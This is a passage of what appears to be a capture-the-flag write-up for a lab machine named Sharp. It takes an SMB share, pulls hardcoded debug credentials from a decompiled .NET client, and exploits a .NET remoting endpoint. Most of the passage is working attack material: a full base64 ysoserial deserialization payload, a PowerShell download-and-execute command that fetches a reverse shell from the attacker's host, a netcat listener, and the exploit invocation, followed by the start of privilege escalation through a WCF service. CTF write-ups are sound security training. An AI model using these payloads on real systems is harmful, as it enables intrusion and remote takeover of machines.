SemanticString__Fragment--Code">$ sudo mount -t cifs -o username=lars,password=G123HHrth234gRG //10.10.10.219/dev ./mnt</code></span></span></p></div><div id="https://www.notion.so/e3d217adf3c441ada360e3ecabbd2712" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la ./mnt</code></span></span></p></div><pre id="https://www.notion.so/5cec5a8886cf409799785232be50cc93" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>-rwxr-xr-x 1 root root 5632 Nov 15 20:55 Client.exe
-rwxr-xr-x 1 root root 70 Nov 16 00:29 notes.txt
-rwxr-xr-x 1 root root 4096 Nov 15 20:55 RemotingLibrary.dll
-rwxr-xr-x 1 root root 6144 Nov 16 22:25 Server.exe</span></span></span></code></pre></li><li id="https://www.notion.so/395cfc448b934aaeaf8af8e6783d2d74" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make local copy:</span></span><div id="https://www.notion.so/6ed352db3c1041d68b45ae0009333d4a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir ./smb/dev && cp ./mnt/* ./smb/dev/</code></span></span></p></div></li><li id="https://www.notion.so/163a8f46564f4291a94640bc77906c7b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">notes.txt</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/0746eb4fabf944f3b4fffb92ae6b2970" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Todo:
Migrate from .Net remoting to WCF
Add input validation</span></span></span></code></pre></li></ul><div id="https://www.notion.so/0f64f5b18eef4815990bae459b5f1ccf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Reversing mysterious Client/Server application with dotPeek:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/8ec8647b2fc74e93a538f7b27aa7c60a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found endpoint and debug user credentials in decompiled </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Client.exe</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/43294eef44494ca493b555cf99df5ed3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token return-type class-name"><span class="token keyword">void</span></span> <span class="token function">Main</span><span class="token punctuation">(</span><span class="token class-name"><span class="token keyword">string</span><span class="token punctuation">[</span><span class="token punctuation">]</span></span> args<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
ChannelServices<span class="token punctuation">.</span><span class="token function">RegisterChannel</span><span class="token punctuation">(</span><span class="token punctuation">(</span>IChannel<span class="token punctuation">)</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">TcpChannel</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">IDictionary</span> channelSinkProperties <span class="token operator">=</span> ChannelServices<span class="token punctuation">.</span><span class="token function">GetChannelSinkProperties</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token punctuation">(</span>RemotingSample<span class="token punctuation">.</span>Remoting<span class="token punctuation">)</span> Activator<span class="token punctuation">.</span><span class="token function">GetObject</span><span class="token punctuation">(</span><span class="token keyword">typeof</span> <span class="token punctuation">(</span><span class="token type-expression class-name">RemotingSample<span class="token punctuation">.</span>Remoting</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"tcp://localhost:8888/SecretSharpDebugApplicationEndpoint"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
channelSinkProperties<span class="token punctuation">[</span><span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token string">"username"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token string">"debug"</span><span class="token punctuation">;</span>
channelSinkProperties<span class="token punctuation">[</span><span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token string">"password"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token string">"SharpApplicationDebugUserPassword123!"</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/d5472ff779764567a998aa75bb40f8f4" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port 8888 has a secret .NET remoting endpoint:</span></span><div id="https://www.notion.so/877e295910cf4b03b58b9ce497f7758a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">tcp://localhost:8888/SecretSharpDebugApplicationEndpoint</code></span></span></p></div></li><li id="https://www.notion.so/358570628de34916a3c0dcb72a5f889d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">With debug credentials:</span></span><div id="https://www.notion.so/5c8a716673d8498888aa68841711b7d8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">debug:SharpApplicationDebugUserPassword123!</code></span></span></p></div></li></ul><div id="https://www.notion.so/29fcdc0f3e5c420e89e8fcc5c57adf92" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Getting a reverse shell through .NET remoting service with ExploitRemotingService:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/2ad8e4631649457a9d341ebedd1f4464" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using nishang's </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Invoke-PowerShellTcp</code></span><span class="SemanticString"> module, add a one-liner at the EOF 
to make the server trigger the reverse shell:</span></span><div id="https://www.notion.so/476c395825ce46bc911357630101ddbd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 6969</code></span></span></p></div></li><li id="https://www.notion.so/276446903cd847259f1a1d2da8b91521" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Now on a Windows VM, serialise the reverse shell payload with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ysoserial</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/d3aef8c966d746ca830bc053772f966b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX(new-object net.webclient).downloadstring('http://10.10.14.26/Invoke-PowerShellTcp.ps1')"</code></span></span></p></div><pre id="https://www.notion.so/ad0796851da44ed0a7f3a57a657594cf" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span 
class="SemanticString"><span>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAGwvYyBwb3dlcnNoZWxsIC1jIElFWChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vMTAuMTAuMTQuMjYvSW52b2tlLVBvd2VyU2hlbGxUY3AucHMxJykGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWw
sIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==</span></span></span></code></pre></li><li id="https://www.notion.so/f433409f98c047a090c3df37af0efad9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Host the reverse shell on HTTP:</span></span><div id="https://www.notion.so/c8215f6722e94a4cacc5a2e5b38c2c98" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> python3 -m http.server 80</code></span></span></p></div></li><li id="https://www.notion.so/3d601072c7744cde9f55f648f0615cf2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for a reverse connection on port 6969:</span></span><div id="https://www.notion.so/f2bed158422d451cb0a772c177c4a3ef" 
class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\nc64.exe -lvnp 6969</code></span></span></p></div></li><li id="https://www.notion.so/9689db78220945949d102ea5d638eec8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Build tyranid/ExploitRemotingService in Visual Studio; the resulting binary will be used to exploit CVE-2014-1806 and CVE-2014-4149 on the .NET remoting service.</span></span></li><li id="https://www.notion.so/4b044c89fdfa4276a1b8c5154347ead5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Send payload with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ExploitRemotingService</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/cd8df66a012149a5bb0bfcdeea70a457" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\ExploitRemotingService.exe -v -s --user=debug --pass="SharpApplicationDebugUserPassword123!" 
tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw AAEAAAD...</code></span></span></p></div></li><li id="https://www.notion.so/17540d0fdc644cafb5cb28ac96943aa1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Ignoring casting errors:</span></span><pre id="https://www.notion.so/0c7de3f6ee8847409a72a128f0c4df33" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>System<span class="token punctuation">.</span>InvalidCastException: Unable to cast object of <span class="token function">type</span> <span class="token string">'System.Collections.Generic.SortedSet`1[System.String]'</span> to <span class="token function">type</span> <span class="token string">'System.Runtime.Remoting.Messaging.IMessage'</span><span class="token punctuation">.</span>
at System<span class="token punctuation">.</span>Runtime<span class="token punctuation">.</span>Remoting<span class="token punctuation">.</span>Channels<span class="token punctuation">.</span>CoreChannel<span class="token punctuation">.</span>DeserializeBinaryRequestMessage<span class="token punctuation">(</span>String objectUri<span class="token punctuation">,</span> Stream inputStream<span class="token punctuation">,</span> Boolean bStrictBinding<span class="token punctuation">,</span> TypeFilterLevel securityLevel<span class="token punctuation">)</span>
at System<span class="token punctuation">.</span>Runtime<span class="token punctuation">.</span>Remoting<span class="token punctuation">.</span>Channels<span class="token punctuation">.</span>BinaryServerFormatterSink<span class="token punctuation">.</span>ProcessMessage<span class="token punctuation">(</span>IServerChannelSinkStack sinkStack<span class="token punctuation">,</span> IMessage requestMsg<span class="token punctuation">,</span> ITransportHeaders requestHeaders<span class="token punctuation">,</span> Stream requestStream<span class="token punctuation">,</span> IMessage& responseMsg<span class="token punctuation">,</span> ITransportHeaders& responseHeaders<span class="token punctuation">,</span> Stream& responseStream<span class="token punctuation">)</span></span></span></span></code></pre></li><li id="https://www.notion.so/42078e1843504de3a8d72c6390469d8f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We get an HTTP request from the server:</span></span><pre id="https://www.notion.so/bfd6554802d74f778435b654a844f8a0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.10.219 - - [08/Jan/2021 19:36:42] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -</span></span></span></code></pre></li><li id="https://www.notion.so/834b9865acd24a4c86826a4a35c5c583" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">And at last, we have a shell as lars:</span></span><div id="https://www.notion.so/63abc3ab677b4b5897b5935b64c6ca7c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> whoami</code></span></span></p></div><pre id="https://www.notion.so/43f15df026c34065953ccbd4df20a4f7" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>sharp\lars</span></span></span></code></pre></li><li id="https://www.notion.so/b60e8072a0b741a6b67b0e7604efac8a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/b592d7d5e4114e57a01f6a55b45497ad" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/b592d7d5e4114e57a01f6a55b45497ad"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/a3a1533dcfd34963b5e96d0e1d448778" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Lars has a folder called 
</span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WCF</code></span><span class="SemanticString"> in his </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">~\Documents\</code></span><span class="SemanticString"> directory, which was mentioned earlier in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">\\10.10.10.219\dev\notes.txt</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/9bef3972a97b4acabf12bc564b8301fe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Migrate from .Net remoting to WCF</span></span></p></div></li><li id="https://www.notion.so/5b70bb4ddd36459abbeb52c06f72c7eb" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Windows Communication Foundation (WCF) is a framework for building service applications, which can send data as asynchronous messages from one service to another.</span></span></li><li id="https://www.notion.so/eb2e1d9475e14d8f9d736bd36277644b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Exploring the folder:</span></span><div id="https://www.notion.so/0365f577db01456eb124f964d435f47a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> ls C:\Users\lars\Documents\wcf</code></span></span></p></div><pre id="https://www.notion.so/a25f47cf03d14108b3514b95981c8443" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Directory: C:\Users\lars\Documents\wcf
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM .vs
d----- 11/15/2020 1:40 PM Client
d----- 11/15/2020 1:40 PM packages
d----- 11/15/2020 1:40 PM RemotingLibrary
d----- 11/15/2020 1:41 PM Server
-a---- 11/15/2020 12:47 PM 2095 wcf.sln</span></span></span></code></pre></li><li id="https://www.notion.so/c5e391900d864d28a2c69bcdb1278e0c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This appears to be a Visual Studio project directory structure, as hinted by the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">wcf.sln</code></span><span class="SemanticString"> file.</span></span></li><li id="https://www.notion.so/8c22647e800b4e7996feebb765a36ee0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Running the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfClient.exe</code></span><span class="SemanticString"> in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">~/Documents/wcf/Client/bin/Release/</code></span><span class="SemanticString"> produces:</span></span><div id="https://www.notion.so/f55de93e67dc48cca09064bd5008f8c5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\WcfClient.exe</code></span></span></p></div><pre id="https://www.notion.so/71a0f6b3f6e74340b8e6f4294a2d8e5f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>DeviceID Free(GB) Total(GB)
-------- -------- ---------
C: 30.1521492004395 39.5097618103027
Physical Processors : 2
Logical Processors : 2
Total Memory(GB) : 3
Free Memory(GB) : 3</span></span></span></code></pre></li><li id="https://www.notion.so/50f1799afa3e40f6aecafb038f54a2b2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Seems like it is used to remotely monitor system performance. Given that the service can access CPU info, it is also likely privileged.</span></span></li><li id="https://www.notion.so/c02eb15f1675431882aff1cae9e5ab67" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We can try to exploit the privileged code execution in the client program to have it spawn a reverse shell as root.</span></span></li><li id="https://www.notion.so/f0adb904497a4c4d8531cd37266c8f45" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's zip this directory up and copy it to the dev share, so we can bring it back to our local machine to look deeper:</span></span><div id="https://www.notion.so/75864ed7f05e4376898f844965e4a56a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> Compress-Archive -LiteralPath ~\Documents\wcf -DestinationPath C:\dev\wcf.zip</code></span></span></p></div></li><li id="https://www.notion.so/59a6e7d0eb4a43ce91e5704115e90de5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Download .zip from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dev</code></span><span class="SemanticString"> share on our local machine:</span></span><div id="https://www.notion.so/037dda48e6e448df810dee52eee59933" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> net use X: 
\\10.10.10.219\dev</code></span></span></p></div></li><li id="https://www.notion.so/3e5e02d532f144fd8df2e3bdb7f272ab" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Clean up after ourselves:</span></span><div id="https://www.notion.so/f66dd529aad848e7beb394c234a1fc61" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> rm C:\dev\wcf.zip</code></span></span></p></div></li></ul><div id="https://www.notion.so/c431a75be00944fe99bdd5225deed522" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Exploring WCF client/server project files in Visual Studio:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/531250f7a0c54622bb668df6341ab8c9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found WCF endpoint under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Program.cs</code></span><span class="SemanticString"> of both client and server:</span></span><pre id="https://www.notion.so/11c97685a58448629e9abdc476b26497" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">new</span> <span class="token constructor-invocation class-name">NetTcpBinding</span><span class="token punctuation">(</span>SecurityMode<span class="token punctuation">.</span>Transport<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token string">"net.tcp://localhost:8889/wcf/NewSecretWcfEndpoint"</span>
<span class="token class-name">Uri</span> baseAddress <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">Uri</span><span class="token punctuation">(</span><span class="token string">"net.tcp://0.0.0.0:8889/wcf/NewSecretWcfEndpoint"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/a0db5e5059074ddeaf62bfe5eb22b1eb" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found unused InvokePowerShell() function under Remoting.cs of the RemotingLibrary:</span></span><pre id="https://www.notion.so/b5e8d48c74894b5da03bae4e55e6988f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">public</span> <span class="token return-type class-name"><span class="token keyword">string</span></span> <span class="token function">InvokePowerShell</span><span class="token punctuation">(</span><span class="token class-name"><span class="token keyword">string</span></span> scriptText<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token class-name">Runspace</span> runspace <span class="token operator">=</span> RunspaceFactory<span class="token punctuation">.</span><span class="token function">CreateRunspace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
runspace<span class="token punctuation">.</span><span class="token function">Open</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Pipeline</span> pipeline <span class="token operator">=</span> runspace<span class="token punctuation">.</span><span class="token function">CreatePipeline</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
pipeline<span class="token punctuation">.</span>Commands<span class="token punctuation">.</span><span class="token function">AddScript</span><span class="token punctuation">(</span>scriptText<span class="token punctuation">)</span><span class="token punctuation">;</span>
pipeline<span class="token punctuation">.</span>Commands<span class="token punctuation">.</span><span class="token function">Add</span><span class="token punctuation">(</span><span class="token string">"Out-String"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Collection <span class="token punctuation"><</span>PSObject<span class="token punctuation">></span></span> results <span class="token operator">=</span> pipeline<span class="token punctuation">.</span><span class="token function">Invoke</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
runspace<span class="token punctuation">.</span><span class="token function">Close</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">StringBuilder</span> stringBuilder <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">StringBuilder</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token class-name">PSObject</span> obj <span class="token keyword">in</span> results<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
stringBuilder<span class="token punctuation">.</span><span class="token function">AppendLine</span><span class="token punctuation">(</span>obj<span class="token punctuation">.</span><span class="token function">ToString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">return</span> stringBuilder<span class="token punctuation">.</span><span class="token function">ToString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
